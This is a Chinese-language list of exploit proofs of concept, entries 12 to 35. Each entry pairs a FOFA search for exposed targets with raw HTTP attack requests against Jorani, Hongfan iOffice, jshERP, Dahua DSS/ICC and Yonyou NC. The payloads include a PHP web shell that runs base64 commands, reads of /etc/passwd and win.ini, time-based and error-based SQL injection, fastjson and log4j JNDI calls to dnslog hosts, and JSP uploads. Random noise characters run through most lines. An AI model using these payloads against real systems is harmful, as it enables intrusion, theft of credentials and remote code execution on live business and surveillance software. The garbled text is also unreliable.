% m/ {6 Y+ l8 n) a! r# LHost: 127.0.0.1( }( t6 `. e4 \: w. Z
Pragma: no-cache
4 @; J4 i' V5 m) o% l& `% nCache-Control: no-cache
+ R: f/ A+ M& K6 TUpgrade-Insecure-Requests: 1% i' l/ i3 t. r7 A: A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36# _! S4 b* B; `3 I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ a2 G7 l4 K% ` U2 u$ l* N/ b
Accept-Encoding: gzip, deflate
2 B6 `/ f8 f$ n8 ]Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
3 C7 e3 S* d+ B0 H9 AConnection: close7 D. v4 d2 ^8 U; A
`3 \3 X& a( [; X
3 L! L3 u' R |2 N' q; C12. Jorani < 1.0.2 远程命令执行
* t) o7 Z3 Y$ Z; [FOFA:title="Jorani"7 b% y# a. e& T) u. T0 Y& _- s
第一步先拿到cookie
( M3 P& g, d9 _+ m: s- a0 iGET /session/login HTTP/1.15 l5 D2 |; G& f, Z! ?
Host: 192.168.190.30' p5 j' X/ ~, M" l# ^/ S6 w" X
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
* q5 @7 Y/ n$ nConnection: close/ K& k) e9 Z8 ~$ ~2 X
Accept-Encoding: gzip
& x3 t) ] J1 w o. i, _" P( I2 d/ T; r6 n
* @9 M. L9 U, I- D: F响应中csrf_cookie_jorani用于后续请求" W% c% Z" A7 e. J' A9 k t! |: b$ C
HTTP/1.1 200 OK
9 M' y5 Z W% W% ]Connection: close7 [4 d0 d) O# _
Cache-Control: no-store, no-cache, must-revalidate
4 f: f9 O6 C6 {Content-Type: text/html; charset=UTF-8
- A# M5 E* e* Q! [2 R s8 GDate: Tue, 24 Oct 2023 09:34:28 GMT
, ]' F- J) U# C& g+ _ SExpires: Thu, 19 Nov 1981 08:52:00 GMT
3 _7 o' J7 u5 C: C* d' x5 Z) j& p2 CLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT
0 ]+ b) Q5 y/ @( J8 [2 H. q4 zPragma: no-cache# S& Q* l( e J+ g# c
Server: Apache/2.4.54 (Debian)% z( z- N, W- r. X0 \
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/) E, k7 U% u3 d" B8 h7 j1 d) H" _
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly. I g, d* ~5 t! \+ x
Vary: Accept-Encoding
8 y6 z0 d c. w6 y& k
2 k. m/ x7 Y: t5 i( ~4 e" {& J) y- O8 w s
POST请求,执行函数并进行base64编码
( O' y) E! L- f3 \$ x! Z% P* N& dPOST /session/login HTTP/1.1
$ d8 Q% I3 a3 e5 P$ [Host: 192.168.190.30& \5 b0 ] {9 g- W3 [( ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
0 B8 H9 D* V' O$ l5 aConnection: close7 I3 Q0 V! w: A8 w/ ?
Content-Length: 252' s* I3 C: T5 d0 t0 [
Content-Type: application/x-www-form-urlencoded: p7 c4 c& u( ~/ I
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
# e2 I0 X. s' {. v. hAccept-Encoding: gzip
) G( ~) a3 |: @: P# @. _; U) c0 s- X- T5 l' v+ ^
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor N) o6 m j+ L9 R' G& M& { q
% v7 I0 l1 y+ i" e, ?8 r3 u- \ Z8 p2 Q. M3 t4 J$ P# {6 f
O, Y/ q6 o9 ?8 J: o向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串1 H9 J: | l) B, L% w1 i# I8 f
GET /pages/view/log-2023-10-24 HTTP/1.1) t: l' C0 @" d [
Host: 192.168.190.30
$ H6 _# _. a2 w9 A B5 Z8 hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.369 ~3 K; D6 K# v5 Z2 `
Connection: close
$ v7 ]# ^! A6 K5 E5 c+ D5 U* l3 RCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
. Y/ p) U2 B+ B) XK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=: M) h2 @+ p [* H' @
X-REQUESTED-WITH: XMLHttpRequest
1 _; H7 Z2 t5 @6 ]4 RAccept-Encoding: gzip
! c1 z f- m6 n; c H! O$ c6 F/ ^$ L/ ~; h
+ T2 K( E0 Y3 Y/ E3 u
13. 红帆iOffice ioFileDown任意文件读取
5 V( A9 l3 ^$ A( c+ D- u9 PFOFA:app="红帆-ioffice"
! K6 ]0 g1 c7 x* g. ~% ~: A' `GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.12 n. ?+ k+ ?* J/ n$ n4 Q8 k
Host: x.x.x.x
$ b2 S9 ` z# m* wUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
, w+ z! A, f! R$ P' l, i6 WConnection: close
% K0 Y, L: x% j) EAccept: */*
' Y# `3 A* m1 S, _: W/ {$ C# fAccept-Encoding: gzip! ]( v- T2 ]- E% f9 u
4 e. ?* o: [7 ~$ `( R
8 d* {0 u$ G: P+ b: y14. 华夏ERP(jshERP)敏感信息泄露
7 g1 b$ @! S3 b% y, mFOFA:body="jshERP-boot"
2 N2 ]& v5 ~- T6 n! U G# T/ y泄露内容包括用户名密码9 U- A/ c/ p* L) ^$ j
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
) O' C" _: |) D5 @Host: x.x.x.x; x {! E4 b6 q0 h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36! {2 Y0 p, F: c* s5 ~5 A/ b, b: G _
Connection: close% x8 @- I( G- C+ J
Accept: */*
. a/ u, Z' B' V. j% G; N! U% zAccept-Language: en
0 t. ?6 O7 X8 P3 W# D. f( @Accept-Encoding: gzip
# u. }: X+ U0 J# }% S4 K& {! b# _
* R. x7 {6 r0 B1 i% o
15. 华夏ERP getAllList信息泄露* [# f m. t' _& A0 Y
CVE-2024-0490
9 z+ |; c& G; G) [0 h6 vFOFA:body="jshERP-boot"
; i P" U7 L! V) A/ P( @! U+ t% o泄露内容包括用户名密码4 u5 M' m+ P5 l/ ^" C0 a
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
1 E+ T n% l, k8 c& G7 KHost: 192.168.40.130:100# w- g; {- b: X5 M- y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36+ ^; b# G$ z. Q( \# m
Connection: close$ R6 r3 r0 b6 |& x6 w# L
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8% h7 v6 p. @4 @) u$ }
Accept-Language: en/ _0 g$ i& n3 v ^% k8 R8 \
sec-ch-ua-platform: Windows
$ n) f$ J a7 T4 ]) t% wAccept-Encoding: gzip
$ ?1 o) @ V8 C) C
, c/ f2 w3 O2 m2 r! _: \& S2 k5 H* `2 }9 T" x
16. 红帆HFOffice医微云SQL注入7 L* `8 t: a$ w$ V& v+ l0 L
FOFA:title="HFOffice"! a2 {8 b- o8 q+ y4 v+ Y% J- U9 J
poc中调用函数计算1234的md5值
) S6 g, z- n" \GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1( s+ M; c9 M( w3 C) V0 `& \: S8 {
Host: x.x.x.x8 y: s7 k; P1 L% \/ X, J/ c
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.369 c [9 ]7 E' ]# ?: m- C7 |
Connection: close; q$ G' D! o1 Z
Accept: */*
3 A3 Q) _' T6 U) G8 a+ o& \Accept-Language: en& B( L, J% ^$ N1 O: Y4 `
Accept-Encoding: gzip
6 F2 D% E( T# `
7 }4 g" w3 |3 `' Q
; R+ e g( G( u6 M+ g8 r17. 大华 DSS itcBulletin SQL 注入/ `2 m% m; P. ~$ @) l7 X" X+ S) n7 `
FOFA:app="dahua-DSS"& c- G( e6 v, n1 o# r( @3 r& x) D
POST /portal/services/itcBulletin?wsdl HTTP/1.1" e9 |: E0 I( d% ?& P! [
Host: x.x.x.x/ t7 z9 z: m: t+ G5 y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
4 b8 G; h/ \! `7 KConnection: close
5 j6 N+ _9 s- @9 a9 k4 H% qContent-Length: 345
, Y2 o0 m, x+ \1 D! n( l" |6 yAccept-Encoding: gzip
2 s% A! t' k, `' ^ n; Y0 N/ r' L
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>) g# K5 c0 J+ F0 F& m. G
<s11:Body>
9 {8 P2 s" q2 b' S1 v <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>7 M8 }: Q* {6 m1 ] A3 b2 H% S6 y8 U% X4 W
<netMarkings>1 `; e2 R; B. A* |
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
+ U6 M9 k& ^: P2 G </netMarkings>, R# [2 Y$ k: ~
</ns1:deleteBulletin>
. v/ q1 k6 ~# W4 W; Z% ^0 @* T </s11:Body>
' j- Y1 D* j/ v9 D</s11:Envelope>
: m7 ]! ~ @, g% ]6 J' {7 x: p0 c& G9 s; O
: b6 l1 B; q3 j( b1 h
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露6 R; k, S$ f; R& t
FOFA:app="dahua-DSS"1 _( t2 I. O, P R; K0 E( O7 n
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.14 p3 W; R& K) n0 T& E/ Z {, S
Host: your-ip% v4 w+ [& N+ Y) d/ M* M, p+ l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+ U+ q9 u6 M' pAccept-Encoding: gzip, deflate5 w% L6 I* q/ C0 _
Accept: */*. ~4 r) N- I3 l% N. E
Connection: keep-alive$ `6 H8 E* ~% z ]& T9 r
6 w6 B l8 N; `' O7 V
( e, f1 e9 s$ x2 v) _% I) |1 P, ^, a
4 p* g6 x- K0 N% R; D' L B
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
: r6 s( J: i1 N! ?( FFOFA:app="dahua-DSS"+ f A# ?4 S( Y; `' E
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.14 m/ H/ z N/ [* N
Host:
' U; }! z% I3 \0 P8 h a, dUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
6 B' Y/ P4 G( \: `* c$ M2 eAccept-Encoding: gzip, deflate4 N1 R: k9 A' x
Accept: */*
# g/ F; B _) DConnection: keep-alive& l$ r. U I9 h x( l/ E& d9 a; R
% B# s2 q' c) Y% {$ B' s4 j+ s6 l% j0 B6 Q Z$ `
20. 大华ICC智能物联综合管理平台任意文件读取
; ]/ d. ^' i, e# F3 q v7 z2 TFOFA:body="*客户端会小于800*"3 K4 C* g( C+ g5 w! l6 s
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
4 _8 H5 T& I5 U& ~& t- s6 dHost: x.x.x.x
+ l/ x6 i. R0 s% s! ? b3 lUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
1 i9 i0 d6 y: ^4 Y, d( q, `0 DConnection: close5 T6 D6 {( l- H
Accept: */*+ n' P, ? @5 \: M3 X4 B3 P
Accept-Language: en7 |( v4 Z; x9 [0 D4 u: D7 O6 T
Accept-Encoding: gzip3 p7 E1 p, A7 @: M7 k7 D+ S
5 x1 }# J. x* G( g- S3 T: z0 w
" Q* C3 l; ?# |+ X
21. 大华ICC智能物联综合管理平台random远程代码执行! |) Q7 [, k( D; v: v
FOFA:icon_hash="-1935899595"
6 }) ] J& R. G/ [5 xPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
0 b8 v6 g- g& p: o5 d* G% b kHost: x.x.x.x
8 h4 d4 l/ m" `/ R' p1 v; PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; T5 a& d! w; j3 Q" l3 D8 v
Content-Length: 161
; n3 l# n) k& s c& GAccept-Encoding: gzip
! t: a# Z) R" H! E sConnection: close) I- w5 E4 }6 L: J3 f8 B
Content-Type: application/json;charset=utf-80 g- m" ~) d# I
& V, m4 H) `/ S; m/ Y. J3 G9 j/ W
{6 N) d" o* D2 e
"a":{
( u6 T; P8 @5 f "@type":"com.alibaba.fastjson.JSONObject",* \; \6 f+ i+ a7 i( x; ]5 Z- ?- M
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
$ t$ c% {; W4 `' ]: B" Y2 N. g }""
$ m `0 u- F' O' M; h. F. K& v}
9 B, R$ q" A/ q+ o) I1 ~
. j5 D% z% A ?$ U: ?8 s
' G( t2 V& a5 v d$ L22. 大华ICC智能物联综合管理平台 log4j远程代码执行. O W* E5 s) ]! B; H0 o" w
FOFA:icon_hash="-1935899595"
3 s6 L5 J( ?) d" h/ j0 FPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1: g4 _9 n: _! H8 Q. M
Host: your-ip9 e# V. U3 o7 \# U: ]2 c5 M% f% B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.369 P, ]9 E/ `2 C8 V$ e4 T/ Y3 w8 ^
Content-Type: application/json;charset=utf-8
I& [0 ?. O C( c
* `" S) F5 }& g; n{3 `: I7 u' Y: z: j% o e
"loginName":"${jndi:ldap://dnslog}"2 v5 R" q0 s9 e
}
- y9 l, @* @7 i, }# B8 u% D. j
/ ^, F( z( X: n3 m7 m3 ^& @& ]+ E% B A/ ^ x
* v5 q3 ?8 h" n8 G, `; j23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
( V8 N# d, [! B; U0 L8 WFOFA:icon_hash="-1935899595"6 J6 R2 @* m6 N& |3 V
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
6 |2 h4 `( ^3 D( FHost: your-ip# ?% j/ T8 B4 m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- v6 Q7 X" G" `/ v8 A1 C
Content-Type: application/json;charset=utf-8
& I- z: S# ~- X L. SAccept-Encoding: gzip
8 `$ p( ~* J! H, yConnection: close
+ O* \( K3 L) m0 m/ a. D" q8 b! P2 i; E
{
6 D9 n; _2 m! b; J0 w. e7 Z "a":{
, i, G( \- r2 H$ ~. S$ ]% H+ v0 U1 K "@type":"com.alibaba.fastjson.JSONObject",$ x. p+ K4 s, @. e9 Y8 S
{"@type":"java.net.URL","val":"http://DNSLOG"}
" V; I$ ~ n( s5 Z) |# M" [ }""
8 f% T1 c" P( {# y j} X$ [0 I9 L6 Y$ d( j- i! k( k
$ H; S; u" a2 ?" ]/ t$ t: ~
5 h4 D" t- u8 v: J
24. 用友NC 6.5 accept.jsp任意文件上传
4 t" } T; l; n: U- B, cFOFA:icon_hash="1085941792"
# G7 b+ }* O, u/ f4 w8 ^POST /aim/equipmap/accept.jsp HTTP/1.17 M2 q( o: }. n; o, q h
Host: x.x.x.x
1 d) I+ z* D0 h! U! L$ m. \; kUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36' F9 S- L; X- p
Connection: close2 \8 S( n& [0 ?- O Z
Content-Length: 449
0 o |4 }" Z% _; UAccept: */*" E4 Z; H; g( ~
Accept-Encoding: gzip
" R; `2 Y- e9 h; SContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc' N3 z7 R$ ^8 @4 ~8 Z! ?/ a# q6 h
7 p' a ~3 E: l) f. q
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc5 F: W8 L2 b" Z( @ }
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"5 J4 [% m# g' a9 [
Content-Type: text/plain+ @( J( x( M. N; W9 i
' E( b z9 a# j2 H( x
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>6 e7 b, z3 \2 l( o% Q
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc1 S! `6 r* p6 q, ^0 d( b# j
Content-Disposition: form-data; name="fname"- C3 Q* P0 V1 e7 T+ w" Q2 k4 d: y! j
: T. b" O2 T# p$ S7 A) H1 `7 i& e8 W
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp" r0 ~; w4 o: `) q& g6 f' c
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--! e) L6 G# s* r- c5 D3 V
/ `5 J7 r$ n6 H- O
* ~5 R: w+ X; _25. 用友NC registerServlet JNDI 远程代码执行
0 @ M. ^2 [: ~0 S) v( _$ D* {FOFA:app="用友-UFIDA-NC"; f7 f4 v* Z" G z! B v9 W
POST /portal/registerServlet HTTP/1.1/ t8 N8 y! H6 y
Host: your-ip
+ o/ j* w4 H, w' ~( N! I/ ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.05 s8 i: R9 }4 l5 _, z& b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.99 }- j; H4 Q. {! T. z. ?- G) \
Accept-Encoding: gzip, deflate T5 P5 p. z6 H1 t; v4 v+ m
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6# v9 b* B/ k: `" Q: c; s P
Content-Type: application/x-www-form-urlencoded
+ t' \/ t$ |# |4 E
& i* b# B- R. o" jtype=1&dsname=ldap://dnslog$ r; C- w) }5 y+ f) P
' ?3 l& Q' f4 T9 s
0 |9 m+ b5 d; a) A/ X. c1 \
, R0 [: k/ Q. a* v' J+ P. d
26. 用友NC linkVoucher SQL注入7 k5 k5 ^* J6 m+ t- a/ }
FOFA:app="用友-UFIDA-NC"$ _: |0 R0 o4 |/ W, ^
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
* X5 w# ~0 C" M7 N8 V8 ^2 Q, cHost: your-ip
4 }8 T9 J" {% {7 F1 zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.360 ?7 z- `. ~6 W( _4 B* [* F
Content-Type: application/x-www-form-urlencoded
* F' `$ F" J( d1 m& U. b, GAccept-Encoding: gzip, deflate- e( G, B2 u0 L& E4 c
Accept: */*
2 p8 v" t5 a( s/ o6 |Connection: keep-alive' _# w+ I& C. h
! N1 |" S/ S' L
8 n9 G8 m: S# k" V% w# l/ B9 R
27. 用友 NC showcontent SQL注入) |) _5 Z' @# F* S
FOFA:icon_hash="1085941792"! R- L' a1 R( a, n! M
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1/ W& w" E* v4 V) m8 V3 z
Host: your-ip
2 G! U) Y8 U' J1 z/ WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.368 c. K* i1 d1 s4 G( t. @: \. `6 ]
Accept-Encoding: identity
" w6 d8 N8 t0 J: d9 g, CConnection: close
6 }" q. I y/ k3 G) dContent-Type: text/xml; charset=utf-88 A5 D- ?; C5 y2 ]% A8 q: k
. p0 Q( Q1 s0 y. Y/ p
7 j# C) l* x9 Q% \- u$ c! n
28. 用友NC grouptemplet 任意文件上传+ C5 R2 W% {$ c8 k% b
FOFA:icon_hash="1085941792"" C& _, _* Z7 B8 L# r
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.10 ]7 P* P R9 s5 v# K
Host: x.x.x.x; a- ^1 H$ {) I4 j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36+ r- k0 z& f/ v% v1 Z# Q9 }% k$ e
Connection: close0 x2 E8 G/ y$ g# v% B4 i- E
Content-Length: 268
. |, i) F/ [, _1 V& L; ~" L( PContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk3 b7 ~! ~% [- X6 K
Accept-Encoding: gzip
; `7 U3 w% k7 E9 \9 g7 d; H) g5 q3 G
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk4 B$ t' x3 e4 l0 c: L) h1 k
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
; C: k/ v5 u3 p, q' {Content-Type: application/octet-stream
6 }& L+ A9 k4 s5 E
1 H/ n8 E! \1 a8 w- g<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>! X( @, M+ S5 [, o
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
. a0 |5 \$ p2 T6 A, R! J4 S6 v( m: [
0 M, Z; g( u: f: N' u/ ]
/uapim/static/pages/nc/head.jsp/ j% j# {* k# y0 A8 ?
! p Q2 @0 t, M29. 用友NC down/bill SQL注入1 W9 H) w# a' g) A. C+ g8 D* Q* O, o
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"1 p( S" j: W( Q$ ~( i# }# d
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
' R; c! I( S# P' |) Z& T6 u' bHost: your-ip/ i9 p4 W# ]: m* |4 W# P0 F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
( R4 Z# H8 H4 B" lContent-Type: application/x-www-form-urlencoded; ?8 f: ]# Y1 L' H0 b: u
Accept-Encoding: gzip, deflate
! o j- P! c6 [! y4 r7 j2 nAccept: */*
- L3 R% ~) e: c2 JConnection: keep-alive$ |7 O6 ^- u4 b$ j9 k
, h# K( o/ N+ }. [" ^1 A
+ i8 a% X1 O3 Z* V) F8 x3 K
30. 用友NC importPml SQL注入
8 x! y4 r. B; o: i% ~/ ^" sFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif": ?9 ?" i0 S6 S- f z; w* V
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1$ b+ N( F) K& Y% t# u$ `5 ~, d
Host: your-ip& e- R' ?. G. B a' Z9 F8 V
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V0 J- C; W- }/ e. E }$ @- z& W" X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36% X+ }$ D' E: v
Connection: close0 r7 C3 r Y% X" [6 |+ ~* H7 j
3 G: y- p9 }$ [% ^, A1 u: }* @$ l7 F5 S
------WebKitFormBoundaryH970hbttBhoCyj9V1 D# b3 C2 o& x7 L K
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"/ G4 {; l5 S! i8 ~
Content-Type: image/jpeg' {+ F) P, }" Q4 |
------WebKitFormBoundaryH970hbttBhoCyj9V--, R' A9 H, V a/ q6 H
1 F6 n- x n1 X: k; S
9 a' K5 n R, _& a
31. 用友NC runStateServlet SQL注入
5 S, E/ e# u% s5 p6 C1 o: q. Hversion<=6.5
7 Z) L E# g4 j0 h' F; N' F; zFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
; i9 s: P8 U, N H7 I' F0 d4 G% xGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
0 j0 e6 O% ^; A- T, L, ?Host: host$ g7 |/ i$ x8 G4 ?2 m. g6 d2 M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
4 ]; ?; ~7 A: y. @ z/ SContent-Type: application/x-www-form-urlencoded
6 h. O, j* a6 C4 t* t
+ k' m" U* _+ }$ y, h! t ~) E, C. x! ]& {1 I' K/ ]- ?
32. 用友NC complainbilldetail SQL注入$ l O5 _' u4 U, [, ]
version= NC633、NC655 ^/ n* F G# k+ m# l; K
FOFA:app="用友-UFIDA-NC": U$ k& N9 A5 O# x- e9 L+ W
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1- e) J. A6 A' L- t# n% A
Host: your-ip
8 \* E) {/ Y3 H2 i" I3 uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
8 U# D |! r+ sContent-Type: application/x-www-form-urlencoded1 c& _. C! c- s
Accept-Encoding: gzip, deflate! D3 V1 E6 G! s1 H. j
Accept: */*( n) `- ^- [: R% V: o9 o( q1 C
Connection: keep-alive
$ P) W6 y& C( e; R- _) {* G% x
* ?1 j+ S: m) X' u. K
3 l1 g' s& I7 }- Z. C$ n& J33. 用友NC downTax/download SQL注入1 ^. j3 r* J5 |# h1 L* g
version:NC6.5FOFA:app="用友-UFIDA-NC"
8 o g: {) G8 _# k$ i( z( MGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1; M# Z. |0 V8 |0 G# Q5 K
Host: your-ip$ c& M+ t/ q- w a; ?- V6 r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 x" |/ n$ I" j- G! F" dContent-Type: application/x-www-form-urlencoded' O! w1 f' Q' z+ V* S
Accept-Encoding: gzip, deflate- r2 l, A' k. m# {! [" X- {# X
Accept: */*7 x9 K- b+ d Q2 b; K
Connection: keep-alive% z P6 Q5 ^2 H7 s" p( \
4 R8 l% B9 [' b! l0 S- L
- d' z4 w) n; a7 S# ?34. 用友NC warningDetailInfo接口SQL注入
& C1 o* z: ^% s7 h$ E" |FOFA:app="用友-UFIDA-NC" M" Z+ b9 Y$ j: V+ o* }
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.13 [4 F; Q/ D; q- g
Host: your-ip
% _6 E5 n( M8 J/ HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
; t8 J& w* n6 k( b6 X0 LContent-Type: application/x-www-form-urlencoded6 R3 l2 M0 k5 \% B9 M
Accept-Encoding: gzip, deflate- _* I @6 s, }% f! m. ?" \
Accept: */*
9 t9 \8 U& l' l4 k9 L2 AConnection: keep-alive3 p) i/ |1 d0 S$ d: Z s
/ @1 }2 N) B, z f3 R" M. E1 p: P5 P+ t: Z4 E% d! N
35. 用友NC-Cloud importhttpscer任意文件上传6 h) _0 L4 s4 ~$ F+ q7 k, ^
FOFA:app="用友-NC-Cloud"
7 R+ S2 }0 W( z6 C5 ePOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
